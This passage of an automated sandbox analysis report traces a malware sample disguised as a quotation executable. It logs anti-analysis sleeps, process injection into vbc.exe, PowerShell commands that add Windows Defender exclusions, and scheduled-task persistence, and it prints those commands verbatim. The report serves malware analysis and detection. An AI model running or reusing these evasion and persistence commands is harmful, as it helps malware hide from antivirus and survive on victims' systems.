                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -593719s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -593609s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1188Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5488Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599104Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597951Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597169Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597039Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596708Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594422Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599422
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599196
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599093
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596906
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596469
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596128
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595889
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594728
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594511
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593609
                Source: vbc.exe, 00000008.00000002.3547363090.0000000005536000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                Source: vbc.exe, 0000000D.00000002.3549205458.0000000006D68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd65c385193e31<
                Source: svchost.exe, 0000000E.00000002.2838813086.000001B656A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2839339670.000001B65C052000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: vbc.exe, 00000008.00000002.3549250427.0000000007478000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd65bb808330b7<
                Source: vbc.exe, 0000000D.00000002.3546972740.0000000004BF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSyst
                Source: svchost.exe, 0000000E.00000002.2839297779.000001B65C041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_09477B70 LdrInitializeThunk,13_2_09477B70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe"
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe"
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 424000Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5196008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 422000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 424000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4956008Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpFB27.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeQueries volume information: C:\Users\user\Desktop\QUOTATION 03664710859027.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
